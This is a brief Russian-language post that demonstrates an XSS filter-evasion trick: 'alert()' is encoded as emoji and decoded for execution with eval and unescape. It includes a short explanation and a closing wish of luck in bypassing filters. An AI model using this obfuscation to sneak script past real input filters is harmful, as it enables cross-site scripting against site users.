Emoji XSS

[...'alert()'].map(z=>String.fromCodePoint(z.charCodeAt(0)+0x1f400)).join('')

"👡👬👥👲👴🐨🐩"

eval(unescape(escape('👡👬👥👲👴🐨🐩').replace(/u.{8}/g,'')))

охапка дров, alert готов

Немного деталей про происходящую магию

При replac'e мы забираем из кода символа его "аналог" в нужном нам диапазоне
После чего и его мы декодим из юникода и получаем читабельный символ

Полное описание со всеми вакханалиями можно прочитать тут:
https://www.stefanjudis.com/blog/hidden-messages-in-javascript-property-names/

Удачных обходов фильтров;)